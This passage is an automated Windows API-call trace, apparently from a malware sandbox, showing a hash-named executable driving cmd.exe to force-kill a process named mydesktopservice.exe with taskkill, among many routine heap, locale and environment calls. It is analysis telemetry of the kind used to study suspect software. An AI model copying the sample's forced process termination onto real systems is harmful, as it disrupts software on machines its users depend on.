GetEnvironmentStringsW () returned 0x717cd8* [0170.231] GetProcessHeap () returned 0x710000 [0170.231] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0xa32) returned 0x71a7a8 [0170.232] FreeEnvironmentStringsA (penv="A") returned 1 [0170.232] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0170.232] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0170.232] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0170.232] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0170.232] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0170.232] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0170.232] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0170.232] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0170.232] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0170.232] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0170.232] GetProcessHeap () returned 0x710000 [0170.232] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x44) returned 0x7105c8 [0170.232] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0170.232] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0170.232] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0170.233] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x710618 [0170.233] FindClose (in: hFindFile=0x710618 | out: hFindFile=0x710618) returned 1 [0170.233] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x710618 [0170.233] FindClose (in: hFindFile=0x710618 | out: hFindFile=0x710618) returned 1 [0170.234] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0170.234] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8d4a6a0d, ftLastAccessTime.dwHighDateTime=0x1d83aa1, ftLastWriteTime.dwLowDateTime=0x8d4a6a0d, ftLastWriteTime.dwHighDateTime=0x1d83aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x710618 [0170.234] FindClose (in: hFindFile=0x710618 | out: hFindFile=0x710618) returned 1 [0170.234] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0170.234] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0170.234] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0170.234] GetProcessHeap () returned 0x710000 [0170.234] RtlFreeHeap (HeapHandle=0x710000, Flags=0x0, BaseAddress=0x71a7a8) returned 1 [0170.234] GetEnvironmentStringsW () returned 0x717cd8* [0170.235] GetProcessHeap () returned 0x710000 [0170.235] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0xa76) returned 0x719d68 [0170.235] FreeEnvironmentStringsA (penv="=") returned 1 [0170.235] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0170.235] GetProcessHeap () returned 0x710000 [0170.235] RtlFreeHeap (HeapHandle=0x710000, Flags=0x0, BaseAddress=0x7105c8) returned 1 [0170.235] GetProcessHeap () returned 0x710000 [0170.235] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x400e) returned 0x71bc68 [0170.235] GetProcessHeap () returned 0x710000 [0170.235] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x5c) returned 0x71a7e8 [0170.236] GetProcessHeap () returned 0x710000 [0170.236] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x4008) returned 0x71fc80 [0170.236] GetProcessHeap () returned 0x710000 [0170.236] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x4008) returned 0x723c90 [0170.238] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0170.238] GetProcessHeap () returned 0x710000 [0170.238] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x418) returned 0x71a850 [0170.238] SetErrorMode (uMode=0x0) returned 0x8003 [0170.238] SetErrorMode (uMode=0x1) returned 0x0 [0170.238] GetFullPathNameW (in: lpFileName="taskkill \\f \\.", nBufferLength=0x208, lpBuffer=0x71a858, lpFilePart=0x19fbac | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f", lpFilePart=0x19fbac*="f") returned 0x29 [0170.239] SetErrorMode (uMode=0x8003) returned 0x1 [0170.239] GetProcessHeap () returned 0x710000 [0170.239] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x71a850, Size=0x8e) returned 0x71a850 [0170.239] GetProcessHeap () returned 0x710000 [0170.239] RtlSizeHeap (HeapHandle=0x710000, Flags=0x0, MemoryPointer=0x71a850) returned 0x8e [0170.239] NeedCurrentDirectoryForExePathW (ExeName="taskkill \\f \\.") returned 1 [0170.239] GetProcessHeap () returned 0x710000 [0170.239] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x62) returned 0x71a8e8 [0170.239] GetProcessHeap () returned 0x710000 [0170.239] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0xb8) returned 0x71a958 [0170.239] GetProcessHeap () returned 0x710000 [0170.239] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x71a958, Size=0x62) returned 0x71a958 [0170.239] GetProcessHeap () returned 0x710000 [0170.239] RtlSizeHeap (HeapHandle=0x710000, Flags=0x0, MemoryPointer=0x71a958) returned 0x62 [0170.239] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0170.239] GetProcessHeap () returned 0x710000 [0170.239] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0xe0) returned 0x71a9c8 [0170.243] GetProcessHeap () returned 0x710000 [0170.243] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x71a9c8, Size=0x76) returned 0x71a9c8 [0170.244] GetProcessHeap () returned 0x710000 [0170.244] RtlSizeHeap (HeapHandle=0x710000, Flags=0x0, MemoryPointer=0x71a9c8) returned 0x76 [0170.244] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0170.244] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f\\im mydesktopservice.exe ", fInfoLevelId=0x1, lpFindFileData=0x19f958, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f958) returned 0xffffffff [0170.244] GetLastError () returned 0x3 [0170.244] GetProcessHeap () returned 0x710000 [0170.245] RtlFreeHeap (HeapHandle=0x710000, Flags=0x0, BaseAddress=0x71fc80) returned 1 [0170.245] GetProcessHeap () returned 0x710000 [0170.245] RtlFreeHeap (HeapHandle=0x710000, Flags=0x0, BaseAddress=0x723c90) returned 1 [0170.246] GetProcessHeap () returned 0x710000 [0170.246] RtlFreeHeap (HeapHandle=0x710000, Flags=0x0, BaseAddress=0x71bc68) returned 1 [0170.246] GetConsoleOutputCP () returned 0x1b5 [0170.251] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0170.251] GetUserDefaultLCID () returned 0x409 [0170.252] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xf434a0, cchData=8 | out: lpLCData=":") returned 2 [0170.252] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0170.252] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0170.252] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0170.253] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xf434b0, cchData=8 | out: lpLCData="/") returned 2 [0170.253] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xf43500, cchData=32 | out: lpLCData="Mon") returned 4 [0170.253] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xf43540, cchData=32 | out: lpLCData="Tue") returned 4 [0170.253] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xf43580, cchData=32 | out: lpLCData="Wed") returned 4 [0170.253] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xf435c0, cchData=32 | out: lpLCData="Thu") returned 4 [0170.253] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xf43600, cchData=32 | out: lpLCData="Fri") returned 4 [0170.253] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xf43640, cchData=32 | out: lpLCData="Sat") returned 4 [0170.253] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xf43680, cchData=32 | out: lpLCData="Sun") returned 4 [0170.253] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xf434c0, cchData=8 | out: lpLCData=".") returned 2 [0170.253] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xf434e0, cchData=8 | out: lpLCData=",") returned 2 [0170.253] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0170.254] GetProcessHeap () returned 0x710000 [0170.254] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x20c) returned 0x71aa90 [0170.254] GetConsoleTitleW (in: lpConsoleTitle=0x71aa90, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0170.258] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0170.258] GetProcAddress (hModule=0x75600000, lpProcName="CopyFileExW") returned 0x7561ffc0 [0170.258] GetProcAddress (hModule=0x75600000, lpProcName="IsDebuggerPresent") returned 0x7561b0b0 [0170.258] GetProcAddress (hModule=0x75600000, lpProcName="SetConsoleInputExeNameW") returned 0x7559b440 [0170.258] GetProcessHeap () returned 0x710000 [0170.258] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x400a) returned 0x71bc68 [0170.258] GetProcessHeap () returned 0x710000 [0170.259] RtlFreeHeap (HeapHandle=0x710000, Flags=0x0, BaseAddress=0x71bc68) returned 1 [0170.260] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0170.260] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0170.260] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0170.260] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0170.260] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0170.260] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0170.260] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0170.260] GetProcessHeap () returned 0x710000 [0170.260] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x58) returned 0x71aca8 [0170.260] GetProcessHeap () returned 0x710000 [0170.260] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x1a) returned 0x710578 [0170.261] GetProcessHeap () returned 0x710000 [0170.261] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x44) returned 0x71ad08 [0170.262] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0170.276] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0170.276] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0170.276] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0170.276] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0170.276] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0170.276] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0170.276] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0170.276] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0170.276] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0170.276] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0170.276] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0170.276] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0170.276] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0170.276] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0170.276] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0170.276] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0170.276] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0170.276] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0170.276] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0170.276] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0170.276] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0170.276] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0170.276] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0170.276] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0170.276] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0170.277] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0170.277] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0170.277] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0170.277] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0170.277] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0170.277] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0170.277] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0170.277] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0170.277] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0170.277] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0170.277] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0170.277] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0170.277] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0170.277] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0170.277] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0170.277] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0170.277] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0170.277] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0170.277] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0170.277] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0170.277] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0170.277] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0170.277] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0170.277] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0170.277] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0170.277] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0170.277] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0170.277] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0170.277] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0170.278] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0170.278] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0170.278] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0170.278] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0170.278] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0170.278] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0170.278] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0170.278] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0170.278] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0170.278] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0170.278] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0170.278] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0170.278] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0170.278] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0170.278] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0170.278] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0170.278] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0170.278] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0170.278] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0170.278] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0170.278] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0170.278] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0170.278] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0170.278] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0170.278] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0170.279] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0170.279] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0170.279] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0170.279] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0170.279] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0170.279] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0170.279] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0170.279] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0170.279] GetProcessHeap () returned 0x710000 [0170.279] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x210) returned 0x71ad58 [0170.279] GetProcessHeap () returned 0x710000 [0170.279] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x56) returned 0x71af70 [0170.280] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0170.280] GetProcessHeap () returned 0x710000 [0170.280] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x418) returned 0x7105c8 [0170.280] SetErrorMode (uMode=0x0) returned 0x8003 [0170.280] SetErrorMode (uMode=0x1) returned 0x0 [0170.280] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x7105d0, lpFilePart=0x19f57c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f57c*="Desktop") returned 0x1d [0170.280] SetErrorMode (uMode=0x8003) returned 0x1 [0170.280] GetProcessHeap () returned 0x710000 [0170.280] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x7105c8, Size=0x56) returned 0x7105c8 [0170.280] GetProcessHeap () returned 0x710000 [0170.281] RtlSizeHeap (HeapHandle=0x710000, Flags=0x0, MemoryPointer=0x7105c8) returned 0x56 [0170.281] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0170.281] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0170.281] GetProcessHeap () returned 0x710000 [0170.281] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x110) returned 0x71afd0 [0170.281] GetProcessHeap () returned 0x710000 [0170.281] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x218) returned 0x710628 [0170.286] GetProcessHeap () returned 0x710000 [0170.286] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x710628, Size=0x112) returned 0x710628 [0170.286] GetProcessHeap () returned 0x710000 [0170.286] RtlSizeHeap (HeapHandle=0x710000, Flags=0x0, MemoryPointer=0x710628) returned 0x112 [0170.286] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0170.286] GetProcessHeap () returned 0x710000 [0170.286] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0xe0) returned 0x71b0e8 [0170.288] GetProcessHeap () returned 0x710000 [0170.288] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x71b0e8, Size=0x76) returned 0x71b0e8 [0170.288] GetProcessHeap () returned 0x710000 [0170.288] RtlSizeHeap (HeapHandle=0x710000, Flags=0x0, MemoryPointer=0x71b0e8) returned 0x76 [0170.288] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0170.288] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0170.288] GetLastError () returned 0x2 [0170.288] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0170.288] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x71b168 [0170.289] GetProcessHeap () returned 0x710000 [0170.289] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x14) returned 0x717620 [0170.289] FindClose (in: hFindFile=0x71b168 | out: hFindFile=0x71b168) returned 1 [0170.289] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0170.289] GetLastError () returned 0x2 [0170.289] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x71b168 [0170.289] GetProcessHeap () returned 0x710000 [0170.289] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x717620, Size=0x4) returned 0x71b1a8 [0170.289] FindClose (in: hFindFile=0x71b168 | out: hFindFile=0x71b168) returned 1 [0170.290] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0170.290] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0170.290] GetConsoleTitleW (in: lpConsoleTitle=0x19f7fc, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0170.291] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f728, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f70c | out: lpAttributeList=0x19f728, lpSize=0x19f70c) returned 1 [0170.291] UpdateProcThreadAttribute (in: lpAttributeList=0x19f728, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f728, lpPreviousValue=0x0) returned 1 [0170.291] GetStartupInfoW (in: lpStartupInfo=0x19f760 | out: lpStartupInfo=0x19f760*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x154, hStdOutput=0x158, hStdError=0x130)) [0170.292] GetProcessHeap () returned 0x710000 [0170.292] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x18) returned 0x717780 [0170.292] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0170.292] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0170.292] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0170.292] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0170.292] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0170.292] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0170.292] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0170.292] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0170.292] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0170.292] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0170.292] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0170.292] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0170.292] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0170.292] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0170.292] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0170.292] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0170.292] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0170.292] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0170.292] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0170.292] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0170.293] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0170.293] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0170.293] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0170.293] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0170.293] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0170.293] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0170.293] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0170.293] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0170.293] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0170.293] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 